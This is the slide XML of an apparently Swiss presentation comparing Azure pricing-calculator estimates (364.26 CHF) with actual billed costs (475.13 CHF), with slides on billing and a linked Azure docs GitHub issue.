              <a:t>=123&amp;par=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Gerade Verbindung mit Pfeil 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8628F4C0-E9E7-5522-02B7-ADBBE2EBECC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192786" y="3800804"/>
            <a:ext cx="261736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462B8FF3-EBEC-05AA-1FF8-7098416E3F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6387348" y="3800804"/>
            <a:ext cx="3698391" cy="288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332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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBC354E4-C3DF-2DFC-850E-4489FE22A583}"/>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el 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{994EA740-AAF9-32E5-1EAA-4F1D16442BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059318" y="2223018"/>
            <a:ext cx="4452249" cy="1022953"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>Pricing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DEF93B6-810D-1F96-1BEC-D061ED85DC5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094931" y="4813075"/>
            <a:ext cx="8519850" cy="1022953"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3074019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B66796-B1FB-2144-FD32-A4F1A3B03662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Calculator</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C216FF-6C90-F718-8D3A-92517FC1EE5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8134" y="2204530"/>
            <a:ext cx="4751784" cy="2504934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC0FDED-E7AB-A71E-A2E1-86E5B420CD3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52083" y="2204530"/>
            <a:ext cx="4556252" cy="2491137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Gerader Verbinder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E987043-6E00-9FFE-4863-83AC7B002F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969264" y="5038344"/>
            <a:ext cx="1004163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1BBA5FF7-A136-9D24-5381-337752BAB10B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088135" y="5420283"/>
            <a:ext cx="5670142" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>Calculated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>monthly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>cost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0"/>
              <a:t>364.26 CHF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textfeld 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB16BBA-7B16-74AE-2F45-93E271F6B0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088134" y="6371582"/>
            <a:ext cx="3582162" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://azure.microsoft.com/en-us/pricing/calculator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1319113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4EA740-AAF9-32E5-1EAA-4F1D16442BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Billing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B00DCE1C-ED36-DEEF-C4A7-41D29354EE9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933899" y="2479603"/>
            <a:ext cx="9853583" cy="2455953"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textfeld 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A18E7E58-167D-4AD3-4D75-8821E8CB64C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088135" y="5420283"/>
            <a:ext cx="4966424" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>Actual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>monthly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>cost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0"/>
              <a:t>475.13 CHF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rechteck: abgerundete Ecken 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26107D51-DECD-1F2D-376D-9FF77BB2CD8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8714232" y="5220292"/>
            <a:ext cx="1947672" cy="861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110.87 CHF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>difference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207331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68995A-CED2-1628-6217-7D358A672B96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Issue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> #33601</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Inhaltsplatzhalter 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E08B48CB-38C7-890E-8003-39AFC186849C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064047" y="2556594"/>
            <a:ext cx="8063905" cy="19169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feld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A37A84-CAC4-EDA7-CB08-DB39E6966E49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="6040279"/>
            <a:ext cx="6094476" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/MicrosoftDocs/azure-docs/issues/33601</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2788836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B66796-B1FB-2144-FD32-A4F1A3B03662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Calculator</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C216FF-6C90-F718-8D3A-92517FC1EE5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8134" y="2204530"/>
            <a:ext cx="4751784" cy="2504934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC0FDED-E7AB-A71E-A2E1-86E5B420CD3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52083" y="2204530"/>
            <a:ext cx="4556252" cy="2491137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Gerader Verbinder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E987043-6E00-9FFE-4863-83AC7B002F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969264" y="5038344"/>
            <a:ext cx="1004163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1BBA5FF7-A136-9D24-5381-337752BAB10B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088135" y="5420283"/>
            <a:ext cx="5670142" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>Calculated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>monthly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" err="1"/>
              <a:t>cost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0"/>
              <a:t>364.26 CHF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textfeld 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB16BBA-7B16-74AE-2F45-93E271F6B0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088134" y="6371582"/>
            <a:ext cx="3582162" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://azure.microsoft.com/en-us/pricing/calculator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Pfeil: nach links 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A28ABBC3-9608-5B0E-3D68-E86CD2B9ADC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18943115">
            <a:off x="7518833" y="1915446"/>
            <a:ext cx="868680" cy="566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feld 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4F0D67-45C8-EA22-4FBE-F21174FEE414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7099172" y="2705972"/>
            <a:ext cx="397002" cy="216000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textfeld 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBC9FB01-1DAB-CA2A-16D9-DEEE62E212F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10080496" y="4315978"/>
            <a:ext cx="1187603" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CHF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>131.08</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textfeld 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1DC1EE2-6358-F267-9CDE-7BD803424C66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4737761" y="5412088"/>
            <a:ext cx="2623514" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>469.12 CHF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Grafik 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91991AF4-39AA-95BD-8961-338066A023A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462036" y="5141034"/>
            <a:ext cx="2631106" cy="1084690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Textfeld 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD5AE88-2633-3AD1-EC16-4D24E655D6B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7191056" y="5381022"/>
            <a:ext cx="838200" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>vs.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190577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6" descr="View from top of a car speeding along a bridge">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4944CEA-B67B-1589-7155-2564ED8D0E2E}"/>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Titel 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2E1539C-60EA-F88D-0758-3C4503DD13C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059318" y="2223018"/>
            <a:ext cx="7819987" cy="880909"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="0D0D0D">
              <a:alpha val="69804"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
